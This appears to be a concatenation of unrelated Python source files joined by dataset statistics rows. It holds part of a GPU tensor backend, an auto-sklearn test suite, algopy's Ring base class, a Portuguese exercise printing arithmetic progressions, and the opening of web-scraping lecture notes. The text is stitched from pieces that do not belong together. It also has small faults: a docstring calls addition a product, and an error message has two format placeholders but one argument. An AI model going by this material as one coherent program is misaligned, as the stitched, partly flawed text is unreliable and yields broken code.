left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.multiply(left, right, out=out)
return out
def divide(self, left, right, out):
"""
Elementwise division
Arguments:
left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.divide(left, right, out=out)
return out
def greater(self, left, right, out):
"""
Elementwise greater than testing
Arguments:
left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.greater(left, right, out=out)
return out
def equal(self, left, right, out):
"""
Performs element-wise equality testing on each element of left and
right, storing the result in out. Each operand is assumed to be the
same shape (or broadcastable as such).
Arguments:
left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.equal(left, right, out=out)
return out
def not_equal(self, left, right, out):
"""
Elementwise not equal testing
Arguments:
left (GPUTensor, numeric): left-hand side operand.
right (GPUTensor, numeric): right-hand side operand.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.not_equal(left, right, out=out)
return out
def clip(self, a, a_min, a_max, out):
"""
Elementwise clipping between a range of specified values
Arguments:
a (GPUTensor): input tensor.
a_min (float): floor value.
a_max (float): ceiling value.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.clip(a, a_min, a_max, out=out)
return out
def log(self, a, out):
"""
Elementwise base-e logarithm
Arguments:
a (GPUTensor): input tensor.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.log(a, out=out)
return out
def tanh(self, a, out):
"""
Elementwise tanh
Arguments:
a (GPUTensor): input tensor.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
self.ng.tanh(a, out=out)
return out
def argmax(self, a, out, axis=0):
"""
Calculates the indices of the maximal element value along the specified
axis. If multiple elements contain the maximum, only the elements of
the first are returned.
Arguments:
tsr (GPUTensor): The GPUTensor on which to find the maximum indices
axis (int): The dimension along which to find the maximum. If set
to None, find the overall maximum index of a flattened
representation of tsr.
out (GPUTensor): Where to store the result. Should be of the
appropriate type and expected shape
Returns:
GPUTensor: reference to out
"""
self.ng.argmax(a, out=out, axis=axis)
return out
def softmax(self, x, out):
"""
Softmax nonlinearity. Computes exp(x-max(x)) / sum_i exp(x_i-max(x_i))
Arguments:
x (GPUTensor): input tensor.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
out[:] = (self.ng.reciprocal(self.ng.sum(
self.ng.exp(x - self.ng.max(x, axis=0)), axis=0)) *
self.ng.exp(x - self.ng.max(x, axis=0)))
return out
def softmax_gradient(self, y, err, out):
"""
Gradient of the softmax nonlinearity.
Arguments:
y (GPUTensor): input tensor.
err (GPUTensor): backpropagated error.
out (GPUTensor): where the result will be stored.
Returns:
GPUTensor: reference to out
"""
raise NotImplementedError("Softmax gradient should use shortcut")
return out
def make_binary_mask(self, tsr, keepthresh=0.5, dtype=default_dtype):
"""
Create a binary mask for dropout layers.
Arguments:
tsr (GPUTensor): Output tensor
keepthresh (float): fraction of ones
"""
self.ng.dropout(keep=keepthresh, out=tsr)
def gdm_compound(self, ps_item, us_item, vs_item, momentum_coef,
learning_rate, epoch):
"""
Perform gradient descent update with momentum.
Arguments:
ps_item (GPUTensor): parameter tensor (e.g. a weight matrix)
us_item (GPUTensor): update tensor, contains gradient wrt. weights
vs_item (GPUTensor): velocity tensor.
momentum_coef (float): momentum coefficient.
learning_rate (float): learning rate.
epoch (int): epoch (used in conjunction with diagnostics).
Outputs are written to vs_item (updated velocity)
and ps_item (updated weights)
"""
vs_item[:] = vs_item * momentum_coef - us_item * learning_rate
ps_item[:] = ps_item + vs_item
def gdmwd_compound(self, ps_item, us_item, vs_item, momentum_coef,
learning_rate, wd, epoch):
"""
Perform gradient descent update with momentum and weight decay.
Arguments:
ps_item (GPUTensor): parameter tensor (e.g. a weight matrix)
us_item (GPUTensor): update tensor, contains gradient wrt. weights
vs_item (GPUTensor): velocity tensor.
momentum_coef (float): momentum coefficient.
learning_rate (float): learning rate.
wd (float): weight decay parameter.
epoch (int): epoch (used in conjunction with diagnostics).
Outputs:
ps_item, the updated weights.
vs_item, the updated velocity.
us_item, used as a temp buffer.
"""
vs_item[:] = (vs_item * momentum_coef -
us_item * learning_rate -
ps_item * learning_rate * wd)
ps_item[:] = ps_item + vs_item
def exp_mavg(self, mavg, newval, rho):
"""
Calculate the exponential moving average
Arguments:
mavg: The running value of the moving average
newval: New sample to be added to the moving average
rho: Interpolation value
"""
mavg[:] = rho * mavg + (1.0 - rho) * newval
def ada_update(self, ps_item, us_item, gs_item, ds_item, ls_item, ss_item,
rho, epsilon):
"""
Update rule for AdaDelta (Zeiler, http://arxiv.org/abs/1212.5701)
Arguments:
ps_item: weight / parameter (will be updated)
us_item: update
gs_item: expected value of Gradient Squared (will be updated)
ds_item: expected value of Delta Squared (will be updated)
ls_item: learning rate (will be updated)
ss_item: Scratch Space
rho: decay constant (determines window size)
epsilon: small positive constant for numerical stability
"""
# Accumulate E[Grad^2]
gs_item[:] = gs_item * rho + (1.0 - rho) * us_item * us_item
# Calculate Updates
ls_item[:] = self.ng.sqrt((ds_item + epsilon) /
(gs_item + epsilon)) * (-1.0) * us_item
# Accumulate E[Delt^2]
ds_item[:] = ds_item * rho + (1.0 - rho) * ls_item * ls_item
# Final update to the params
ps_item[:] = ps_item + ls_item
def rms_update(self, params, updates, run_squares, velocity, scratch_space,
gamma, epsilon, learning_rate, momentum_coef):
# Update running squares
run_squares[:] = gamma * run_squares + (1. - gamma) * updates * updates
# Now scale the gradient by lr / rms(grad) (with a epsilon term for
# stability) and use it to update the params
if momentum_coef == 0:
params[:] = params - learning_rate * updates * self.ng.reciprocal(
self.ng.sqrt(run_squares) + epsilon)
else:
velocity[:] = velocity * momentum_coef - \
learning_rate * updates * \
self.ng.reciprocal(self.ng.sqrt(run_squares) + epsilon)
params[:] = params + velocity
def fprop_bn_compound(self, inputs, beta, gamma, eps, xhat,
xmean, xvar, gmean, gvar, rho, out):
"""
Batch normalization forward pass, compounded to run in 3 kernel calls.
Arguments:
inputs: input data to be normalized
beta: location parameter
gamma: scale parameter
eps: small constant for numerical stability
xvar: variance (updated)
xhat: normalized input (updated)
out: normalized and rescaled input (updated)
"""
xvar[:] = self.ng.var(inputs, axis=1)
xmean[:] = self.ng.mean(inputs, axis=1)
gmean[:] = gmean * rho + (1.0 - rho) * xmean
gvar[:] = gvar * rho + (1.0 - rho) * xvar
xvar[:] = self.ng.reciprocal(self.ng.sqrt(xvar + eps))
xhat[:] = xvar * (inputs - xmean)
out[:] = xhat * gamma + beta
return out
def bprop_bn_compound(self, xhat, error, xvar, gamma,
beta_updates, gamma_updates):
"""
Batch normalization backward pass, compounded to run with 4 kernel
calls.
Arguments:
xhat: normalized input data (updated)
error: backpropagated deltas (updated)
xvar: precomputed variance
gamma: scale parameter
beta_updates: gradient update for beta (updated)
gamma_updates: gradient update for gamma (updated)
"""
gamma_updates[:] = self.ng.sum(xhat * error, axis=1)
beta_updates[:] = self.ng.sum(error, axis=1)
xhat[:] = (xhat * gamma_updates + beta_updates) / float(xhat.shape[1])
error[:] = xvar * gamma * (error - xhat)
| 39.736842 | 79 | 0.556126 | 47,070 | 0.974131 | 0 | 0 | 0 | 0 | 0 | 0 | 33,903 | 0.701635 |
9ef85b894eb9c57e729d7cdbf2e496c34efcf07f | 23,685 | py | Python | test/test_automl/test_automl.py | ihounie/auto-sklearn | 6a72f0df60b0c66ad75b0100d8d22c07da6217bb | [
"BSD-3-Clause"
]
| null | null | null | test/test_automl/test_automl.py | ihounie/auto-sklearn | 6a72f0df60b0c66ad75b0100d8d22c07da6217bb | [
"BSD-3-Clause"
]
| null | null | null | test/test_automl/test_automl.py | ihounie/auto-sklearn | 6a72f0df60b0c66ad75b0100d8d22c07da6217bb | [
"BSD-3-Clause"
]
| 1 | 2021-04-06T09:38:12.000Z | 2021-04-06T09:38:12.000Z | # -*- encoding: utf-8 -*-
import os
import pickle
import sys
import time
import glob
import unittest
import unittest.mock
import numpy as np
import pandas as pd
import sklearn.datasets
from smac.scenario.scenario import Scenario
from smac.facade.roar_facade import ROAR
from autosklearn.util.backend import Backend
from autosklearn.automl import AutoML
import autosklearn.automl
from autosklearn.data.xy_data_manager import XYDataManager
from autosklearn.metrics import accuracy, log_loss, balanced_accuracy
import autosklearn.pipeline.util as putil
from autosklearn.util.logging_ import setup_logger, get_logger
from autosklearn.constants import MULTICLASS_CLASSIFICATION, BINARY_CLASSIFICATION, REGRESSION
from smac.tae.execute_ta_run import StatusType
sys.path.append(os.path.dirname(__file__))
from base import Base # noqa (E402: module level import not at top of file)
class AutoMLStub(AutoML):
def __init__(self):
self.__class__ = AutoML
self._task = None
class AutoMLTest(Base, unittest.TestCase):
_multiprocess_can_split_ = True
def setUp(self):
super().setUp()
self.automl = AutoMLStub()
self.automl._shared_mode = False
self.automl._seed = 42
self.automl._backend = unittest.mock.Mock(spec=Backend)
self.automl._delete_output_directories = lambda: 0
def test_refit_shuffle_on_fail(self):
backend_api = self._create_backend('test_refit_shuffle_on_fail')
failing_model = unittest.mock.Mock()
failing_model.fit.side_effect = [ValueError(), ValueError(), None]
failing_model.fit_transformer.side_effect = [
ValueError(), ValueError(), (None, {})]
failing_model.get_max_iter.return_value = 100
auto = AutoML(backend_api, 20, 5)
ensemble_mock = unittest.mock.Mock()
ensemble_mock.get_selected_model_identifiers.return_value = [(1, 1, 50.0)]
auto.ensemble_ = ensemble_mock
for budget_type in [None, 'iterations']:
auto._budget_type = budget_type
auto.models_ = {(1, 1, 50.0): failing_model}
# Make sure a valid 2D array is given to automl
X = np.array([1, 2, 3]).reshape(-1, 1)
y = np.array([1, 2, 3])
auto.refit(X, y)
self.assertEqual(failing_model.fit.call_count, 3)
self.assertEqual(failing_model.fit_transformer.call_count, 3)
del auto
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_only_loads_ensemble_models(self):
def side_effect(ids, *args, **kwargs):
return models if ids is identifiers else {}
# Add a resampling strategy as this is required by load_models
self.automl._resampling_strategy = 'holdout'
identifiers = [(1, 2), (3, 4)]
models = [42]
load_ensemble_mock = unittest.mock.Mock()
load_ensemble_mock.get_selected_model_identifiers.return_value = identifiers
self.automl._backend.load_ensemble.return_value = load_ensemble_mock
self.automl._backend.load_models_by_identifiers.side_effect = side_effect
self.automl._load_models()
self.assertEqual(models, self.automl.models_)
self.assertIsNone(self.automl.cv_models_)
self.automl._resampling_strategy = 'cv'
models = [42]
self.automl._backend.load_cv_models_by_identifiers.side_effect = side_effect
self.automl._load_models()
self.assertEqual(models, self.automl.cv_models_)
def test_check_for_models_if_no_ensemble(self):
models = [42]
self.automl._backend.load_ensemble.return_value = None
self.automl._backend.list_all_models.return_value = models
self.automl._disable_evaluator_output = False
self.automl._load_models()
def test_raises_if_no_models(self):
self.automl._backend.load_ensemble.return_value = None
self.automl._backend.list_all_models.return_value = []
self.automl._resampling_strategy = 'holdout'
self.automl._disable_evaluator_output = False
self.assertRaises(ValueError, self.automl._load_models)
self.automl._disable_evaluator_output = True
self.automl._load_models()
def test_fit(self):
backend_api = self._create_backend('test_fit')
X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')
automl = autosklearn.automl.AutoML(
backend=backend_api,
time_left_for_this_task=20,
per_run_time_limit=5,
metric=accuracy,
)
automl.fit(
X_train, Y_train, task=MULTICLASS_CLASSIFICATION,
)
score = automl.score(X_test, Y_test)
self.assertGreaterEqual(score, 0.8)
self.assertEqual(automl._task, MULTICLASS_CLASSIFICATION)
del automl
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_delete_non_candidate_models(self):
backend_api = self._create_backend(
'test_delete', delete_tmp_folder_after_terminate=False)
seed = 555
X, Y, _, _ = putil.get_dataset('iris')
automl = autosklearn.automl.AutoML(
backend_api,
time_left_for_this_task=30,
per_run_time_limit=5,
ensemble_nbest=3,
seed=seed,
initial_configurations_via_metalearning=0,
resampling_strategy='holdout',
include_estimators=['sgd'],
include_preprocessors=['no_preprocessing'],
metric=accuracy,
)
automl.fit(X, Y, task=MULTICLASS_CLASSIFICATION,
X_test=X, y_test=Y)
# Assert at least one model file has been deleted and that there were no
# deletion errors
log_file_path = glob.glob(os.path.join(
backend_api.temporary_directory, 'AutoML(' + str(seed) + '):*.log'))
with open(log_file_path[0]) as log_file:
log_content = log_file.read()
self.assertIn('Deleted files of non-candidate model', log_content)
self.assertNotIn('Failed to delete files of non-candidate model', log_content)
self.assertNotIn('Failed to lock model', log_content)
# Assert that the files of the models used by the ensemble weren't deleted
model_files = backend_api.list_all_models(seed=seed)
model_files_idx = set()
for m_file in model_files:
# Extract the model identifiers from the filename
m_file = os.path.split(m_file)[1].replace('.model', '').split('.', 2)
model_files_idx.add((int(m_file[0]), int(m_file[1]), float(m_file[2])))
ensemble_members_idx = set(automl.ensemble_.identifiers_)
self.assertTrue(ensemble_members_idx.issubset(model_files_idx))
del automl
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_fit_roar(self):
def get_roar_object_callback(
scenario_dict,
seed,
ta,
ta_kwargs,
**kwargs
):
"""Random online adaptive racing.
http://ml.informatik.uni-freiburg.de/papers/11-LION5-SMAC.pdf"""
scenario = Scenario(scenario_dict)
return ROAR(
scenario=scenario,
rng=seed,
tae_runner=ta,
tae_runner_kwargs=ta_kwargs,
)
backend_api = self._create_backend('test_fit_roar')
X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')
automl = autosklearn.automl.AutoML(
backend=backend_api,
time_left_for_this_task=20,
per_run_time_limit=5,
initial_configurations_via_metalearning=0,
get_smac_object_callback=get_roar_object_callback,
metric=accuracy,
)
setup_logger()
automl._logger = get_logger('test_fit_roar')
automl.fit(
X_train, Y_train, task=MULTICLASS_CLASSIFICATION,
)
score = automl.score(X_test, Y_test)
self.assertGreaterEqual(score, 0.8)
self.assertEqual(automl._task, MULTICLASS_CLASSIFICATION)
del automl
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_binary_score_and_include(self):
"""
Test fix for binary classification prediction
taking the index 1 of second dimension in prediction matrix
"""
backend_api = self._create_backend('test_binary_score_and_include')
data = sklearn.datasets.make_classification(
n_samples=400, n_features=10, n_redundant=1, n_informative=3,
n_repeated=1, n_clusters_per_class=2, random_state=1)
X_train = data[0][:200]
Y_train = data[1][:200]
X_test = data[0][200:]
Y_test = data[1][200:]
automl = autosklearn.automl.AutoML(
backend_api, 20, 5,
include_estimators=['sgd'],
include_preprocessors=['no_preprocessing'],
metric=accuracy,
)
automl.fit(X_train, Y_train, task=BINARY_CLASSIFICATION)
self.assertEqual(automl._task, BINARY_CLASSIFICATION)
# TODO, the assumption from above is not really tested here
# Also, the score method should be removed, it only makes little sense
score = automl.score(X_test, Y_test)
self.assertGreaterEqual(score, 0.4)
del automl
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_automl_outputs(self):
backend_api = self._create_backend('test_automl_outputs')
X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')
name = 'iris'
data_manager_file = os.path.join(
backend_api.temporary_directory,
'.auto-sklearn',
'datamanager.pkl'
)
auto = autosklearn.automl.AutoML(
backend_api, 20, 5,
initial_configurations_via_metalearning=0,
seed=100,
metric=accuracy,
)
setup_logger()
auto._logger = get_logger('test_automl_outputs')
auto.fit(
X=X_train,
y=Y_train,
X_test=X_test,
y_test=Y_test,
dataset_name=name,
task=MULTICLASS_CLASSIFICATION,
)
# pickled data manager (without one hot encoding!)
with open(data_manager_file, 'rb') as fh:
D = pickle.load(fh)
self.assertTrue(np.allclose(D.data['X_train'], X_train))
# Check that all directories are there
fixture = ['cv_models', 'true_targets_ensemble.npy',
'start_time_100', 'datamanager.pkl',
'predictions_ensemble',
'ensembles', 'predictions_test', 'models']
self.assertEqual(sorted(os.listdir(os.path.join(backend_api.temporary_directory,
'.auto-sklearn'))),
sorted(fixture))
# At least one ensemble, one validation, one test prediction and one
# model and one ensemble
fixture = os.listdir(os.path.join(backend_api.temporary_directory,
'.auto-sklearn', 'predictions_ensemble'))
self.assertGreater(len(fixture), 0)
fixture = glob.glob(os.path.join(backend_api.temporary_directory, '.auto-sklearn',
'models', '100.*.model'))
self.assertGreater(len(fixture), 0)
fixture = os.listdir(os.path.join(backend_api.temporary_directory,
'.auto-sklearn', 'ensembles'))
self.assertIn('100.0000000001.ensemble', fixture)
# Start time
start_time_file_path = os.path.join(backend_api.temporary_directory,
'.auto-sklearn', "start_time_100")
with open(start_time_file_path, 'r') as fh:
start_time = float(fh.read())
self.assertGreaterEqual(time.time() - start_time, 10)
del auto
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_do_dummy_prediction(self):
datasets = {
'breast_cancer': BINARY_CLASSIFICATION,
'wine': MULTICLASS_CLASSIFICATION,
'diabetes': REGRESSION,
}
for name, task in datasets.items():
backend_api = self._create_backend('test_do_dummy_prediction')
X_train, Y_train, X_test, Y_test = putil.get_dataset(name)
datamanager = XYDataManager(
X_train, Y_train,
X_test, Y_test,
task=task,
dataset_name=name,
feat_type=None,
)
auto = autosklearn.automl.AutoML(
backend_api, 20, 5,
initial_configurations_via_metalearning=25,
metric=accuracy,
)
setup_logger()
auto._logger = get_logger('test_do_dummy_predictions')
auto._backend.save_datamanager(datamanager)
D = backend_api.load_datamanager()
# Check if data manager is correcly loaded
self.assertEqual(D.info['task'], datamanager.info['task'])
auto._do_dummy_prediction(D, 1)
# Ensure that the dummy predictions are not in the current working
# directory, but in the temporary directory.
self.assertFalse(os.path.exists(os.path.join(os.getcwd(),
'.auto-sklearn')))
self.assertTrue(os.path.exists(os.path.join(
backend_api.temporary_directory, '.auto-sklearn', 'predictions_ensemble',
'predictions_ensemble_1_1_0.0.npy')))
del auto
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
@unittest.mock.patch('autosklearn.evaluation.ExecuteTaFuncWithQueue.run')
def test_fail_if_dummy_prediction_fails(self, ta_run_mock):
backend_api = self._create_backend('test_fail_if_dummy_prediction_fails')
X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')
datamanager = XYDataManager(
X_train, Y_train,
X_test, Y_test,
task=2,
feat_type=['Numerical' for i in range(X_train.shape[1])],
dataset_name='iris',
)
time_for_this_task = 30
per_run_time = 10
auto = autosklearn.automl.AutoML(backend_api,
time_for_this_task,
per_run_time,
initial_configurations_via_metalearning=25,
metric=accuracy,
)
setup_logger()
auto._logger = get_logger('test_fail_if_dummy_prediction_fails')
auto._backend._make_internals_directory()
auto._backend.save_datamanager(datamanager)
# First of all, check that ta.run() is actually called.
ta_run_mock.return_value = StatusType.SUCCESS, None, None, "test"
auto._do_dummy_prediction(datamanager, 1)
ta_run_mock.assert_called_once_with(1, cutoff=time_for_this_task)
# Case 1. Check that function raises no error when statustype == success.
# ta.run() returns status, cost, runtime, and additional info.
ta_run_mock.return_value = StatusType.SUCCESS, None, None, "test"
raised = False
try:
auto._do_dummy_prediction(datamanager, 1)
except ValueError:
raised = True
self.assertFalse(raised, 'Exception raised')
# Case 2. Check that if statustype returned by ta.run() != success,
# the function raises error.
ta_run_mock.return_value = StatusType.CRASHED, None, None, "test"
self.assertRaisesRegex(ValueError,
'Dummy prediction failed with run state StatusType.CRASHED '
'and additional output: test.',
auto._do_dummy_prediction,
datamanager, 1,
)
ta_run_mock.return_value = StatusType.ABORT, None, None, "test"
self.assertRaisesRegex(ValueError,
'Dummy prediction failed with run state StatusType.ABORT '
'and additional output: test.',
auto._do_dummy_prediction,
datamanager, 1,
)
ta_run_mock.return_value = StatusType.TIMEOUT, None, None, "test"
self.assertRaisesRegex(ValueError,
'Dummy prediction failed with run state StatusType.TIMEOUT '
'and additional output: test.',
auto._do_dummy_prediction,
datamanager, 1,
)
ta_run_mock.return_value = StatusType.MEMOUT, None, None, "test"
self.assertRaisesRegex(ValueError,
'Dummy prediction failed with run state StatusType.MEMOUT '
'and additional output: test.',
auto._do_dummy_prediction,
datamanager, 1,
)
ta_run_mock.return_value = StatusType.CAPPED, None, None, "test"
self.assertRaisesRegex(ValueError,
'Dummy prediction failed with run state StatusType.CAPPED '
'and additional output: test.',
auto._do_dummy_prediction,
datamanager, 1,
)
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
@unittest.mock.patch('autosklearn.smbo.AutoMLSMBO.run_smbo')
def test_exceptions_inside_log_in_smbo(self, smbo_run_mock):
# Make sure that any exception during the AutoML fit due to
# SMAC are properly captured in a log file
backend_api = self._create_backend('test_exceptions_inside_log')
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
automl = autosklearn.automl.AutoML(
backend_api,
20,
5,
metric=accuracy,
)
output_file = 'test_exceptions_inside_log.log'
setup_logger(output_file=output_file)
logger = get_logger('test_exceptions_inside_log')
# Create a custom exception to prevent other errors to slip in
class MyException(Exception):
pass
X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')
# The first call is on dummy predictor failure
message = str(np.random.randint(100)) + '_run_smbo'
smbo_run_mock.side_effect = MyException(message)
with unittest.mock.patch('autosklearn.automl.AutoML._get_logger') as mock:
mock.return_value = logger
with self.assertRaises(MyException):
automl.fit(
X_train,
Y_train,
task=MULTICLASS_CLASSIFICATION,
)
with open(output_file) as f:
self.assertTrue(message in f.read())
# Cleanup
os.unlink(output_file)
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_load_best_individual_model(self):
backend_api = self._create_backend('test_fit')
for metric in [log_loss, balanced_accuracy]:
X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')
automl = autosklearn.automl.AutoML(
backend=backend_api,
time_left_for_this_task=20,
per_run_time_limit=5,
metric=metric,
)
with unittest.mock.patch(
'autosklearn.ensemble_builder.EnsembleBuilder.run'
) as mock_ensemble_run:
mock_ensemble_run.side_effect = MemoryError
automl.fit(
X_train, Y_train, task=MULTICLASS_CLASSIFICATION,
)
# A memory error occurs in the ensemble construction
self.assertIsNone(automl._backend.load_ensemble(automl._seed))
# The load model is robust to this and loads the best model
automl._load_models()
self.assertIsNotNone(automl.ensemble_)
# Just 1 model is there for ensemble and all weight must be on it
get_models_with_weights = automl.get_models_with_weights()
self.assertEqual(len(get_models_with_weights), 1)
self.assertEqual(get_models_with_weights[0][0], 1.0)
# Match a toy dataset
if metric._sign < 0:
self.assertLessEqual(automl.score(X_test, Y_test), 0.2)
else:
self.assertGreaterEqual(automl.score(X_test, Y_test), 0.8)
del automl
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_fail_if_feat_type_on_pandas_input(self):
"""We do not support feat type when pandas
is provided as an input
"""
backend_api = self._create_backend('test_fail_feat_pandas')
automl = autosklearn.automl.AutoML(
backend=backend_api,
time_left_for_this_task=20,
per_run_time_limit=5,
metric=accuracy,
)
X_train = pd.DataFrame({'a': [1, 1], 'c': [1, 2]})
y_train = [1, 0]
with self.assertRaisesRegex(ValueError,
"feat_type cannot be provided when using pandas"):
automl.fit(
X_train, y_train,
task=BINARY_CLASSIFICATION,
feat_type=['Categorical', 'Numerical'],
)
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
def test_fail_if_dtype_changes_automl(self):
"""We do not support changes in the input type.
Once a estimator is fitted, it should not change data type
"""
backend_api = self._create_backend('test_fail_feat_typechange')
automl = autosklearn.automl.AutoML(
backend=backend_api,
time_left_for_this_task=20,
per_run_time_limit=5,
metric=accuracy,
)
X_train = pd.DataFrame({'a': [1, 1], 'c': [1, 2]})
y_train = [1, 0]
automl.InputValidator.validate(X_train, y_train, is_classification=True)
with self.assertRaisesRegex(ValueError,
"Auto-sklearn previously received features of type"):
automl.fit(
X_train.to_numpy(), y_train,
task=BINARY_CLASSIFICATION,
)
self._tearDown(backend_api.temporary_directory)
self._tearDown(backend_api.output_directory)
if __name__ == "__main__":
unittest.main()
| 39.343854 | 94 | 0.609246 | 22,752 | 0.960608 | 0 | 0 | 5,760 | 0.243192 | 0 | 0 | 4,070 | 0.171839 |
9ef87644a467b7a43c75ac4ae95f1780dab19950 | 3,934 | py | Python | algopy/base_type.py | arthus701/algopy | 1e2430f803289bbaed6bbdff6c28f98d7767835c | [
"Unlicense"
]
| 54 | 2015-03-05T13:38:08.000Z | 2021-11-29T11:54:48.000Z | algopy/base_type.py | arthus701/algopy | 1e2430f803289bbaed6bbdff6c28f98d7767835c | [
"Unlicense"
]
| 7 | 2016-04-06T11:25:00.000Z | 2020-11-09T13:53:20.000Z | algopy/base_type.py | arthus701/algopy | 1e2430f803289bbaed6bbdff6c28f98d7767835c | [
"Unlicense"
]
| 13 | 2015-01-17T17:05:56.000Z | 2021-08-05T01:13:16.000Z | """
This implements an abstrace base class Ring .
Rationale:
Goal is to separate the datatype specification from the algorithms and containers for the following reasons:
1) It allows to directly use the algorithms *without* overhead. E.g. calling mul(z.data, x.data, y.data)
has much less overhead than z = x.__mul__(y). data is to be kept as close as possible to
machine primitives. E.g. data is array or tuple of arrays.
2) Potential reuse of an algorithm in several datatypes.
3) Relatively easy to connect high performance algorithms with a very highlevel abstract description.
For instance, most programming languages allow calling C-functions. Therefore, the algorithms
should be given as void fcn(int A, double B, ...)
For instance, the datatype is a truncated Taylor polynomial R[t]/<t^D> of the class Foo.
The underlying container is a simple array of doubles.
"""
import numpy
class Ring(object):
"""
An abstract base class in an attempt to follow the DRY principle.
It implements the algebraic class of a ring as defined on
http://en.wikipedia.org/wiki/Ring_%28mathematics%29
The idea is that the set is described in data and the operations +,* etc.
are implemented as functions that operate on the data.
E.g. the factor ring of natural numbers modulo 4, x.data = 3 y.data = 2
then z = add(x,y) is implemented as
def add(x,y):
return self.__class__((x.data*y.data)%4)
and one obtains z.data = 1
Warning:
Since this class is only of little value it may be deprecated in the future.
"""
data = NotImplementedError()
def totype(self, x):
"""
tries to convert x to an object of the class
works for : scalar x, numpy.ndarray x
Remark:
at the moment, scalar x expanded as Ring with the same degree as self though.
The reason is a missing implementation that works for graded rings of different degree.
Once such implementations exist, this function should be adapted.
"""
if numpy.isscalar(x):
xdata = self.__class__.__zeros_like__(self.data)
self.__class__.__scalar_to_data__(xdata, x)
return self.__class__(xdata)
elif isinstance(x, numpy.ndarray):
raise NotImplementedError('sorry, not implemented just yet')
elif not isinstance(x, self.__class__):
raise NotImplementedError('Cannot convert x\n type(x) = %s but expected type(x) = %s'%(str(type(x))))
else:
return x
def __add__(self, rhs):
rhs = self.totype(rhs)
retval = self.__class__(self.__class__.__zeros_like__(self.data))
self.__class__.add(retval.data, self.data, rhs.data)
return retval
def __sub__(self, rhs):
rhs = self.totype(rhs)
retval = self.__class__(self.__class__.__zeros_like__(self.data))
self.__class__.sub(retval.data, self.data, rhs.data)
return retval
def __mul__(self,rhs):
rhs = self.totype(rhs)
retval = self.__class__(self.__class__.__zeros_like__(self.data))
self.__class__.mul(retval.data, self.data, rhs.data)
return retval
def __truediv__(self,rhs):
rhs = self.totype(rhs)
retval = self.__class__(self.__class__.__zeros_like__(self.data))
self.__class__.div(retval.data, self.data, rhs.data)
return retval
def __radd__(self, lhs):
return self + lhs
def __rmul__(self, lhs):
return self * lhs
def zeros_like(self):
return self.__class__(self.__class__.__zeros_like__(self.data))
def __str__(self):
return str(self.data)
| 35.125 | 113 | 0.630147 | 2,939 | 0.747077 | 0 | 0 | 0 | 0 | 0 | 0 | 2,170 | 0.551601 |
9ef906903676953e2a8a6d553c8fc0e08426873c | 556 | py | Python | estrutura-repeticao-while/ex062.py | TacilioRodriguez/Python | 0b98dc8336e014046c579b387013b2871024e3d0 | [
"Unlicense"
]
| null | null | null | estrutura-repeticao-while/ex062.py | TacilioRodriguez/Python | 0b98dc8336e014046c579b387013b2871024e3d0 | [
"Unlicense"
]
| null | null | null | estrutura-repeticao-while/ex062.py | TacilioRodriguez/Python | 0b98dc8336e014046c579b387013b2871024e3d0 | [
"Unlicense"
]
| null | null | null | """
Melhore o Desafio 061, perguntando para o usuário se ele quer mostrar mais alguns termos.
O programa encerra quando ele disser que quer mostrar 0 termos.
"""
primeiro = int(input('Digite o termo: '))
razao = int(input('Digite a razão: '))
termo = primeiro
cont = 1
total = 0
mais = 10
while mais != 0:
total = total + mais
while cont <= total:
print('{} -> '.format(termo), end=' ')
termo = termo + razao
cont = cont + 1
print('Pausa')
mais = int(input('Quantos termos você quer mostrar a mais? '))
print('FIM') | 27.8 | 89 | 0.633094 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 266 | 0.47585 |
9ef958e7d381e2efbcf979fbddc497610f9580d1 | 3,487 | py | Python | Udemy_PythonBootcamp/Sec15_WebScraping.py | gonzalosc2/LearningPython | 0210d4cbbb5e154f12007b8e8f825fd3d0022be0 | [
"MIT"
]
| null | null | null | Udemy_PythonBootcamp/Sec15_WebScraping.py | gonzalosc2/LearningPython | 0210d4cbbb5e154f12007b8e8f825fd3d0022be0 | [
"MIT"
]
| null | null | null | Udemy_PythonBootcamp/Sec15_WebScraping.py | gonzalosc2/LearningPython | 0210d4cbbb5e154f12007b8e8f825fd3d0022be0 | [
"MIT"
]
| null | null | null | ####################################
# author: Gonzalo Salazar
# course: 2020 Complete Python Bootcamps: From Zero to Hero in Python
# purpose: lecture notes
# description: Section 15 - Web Scraping
# other: N/A
####################################
# RULES
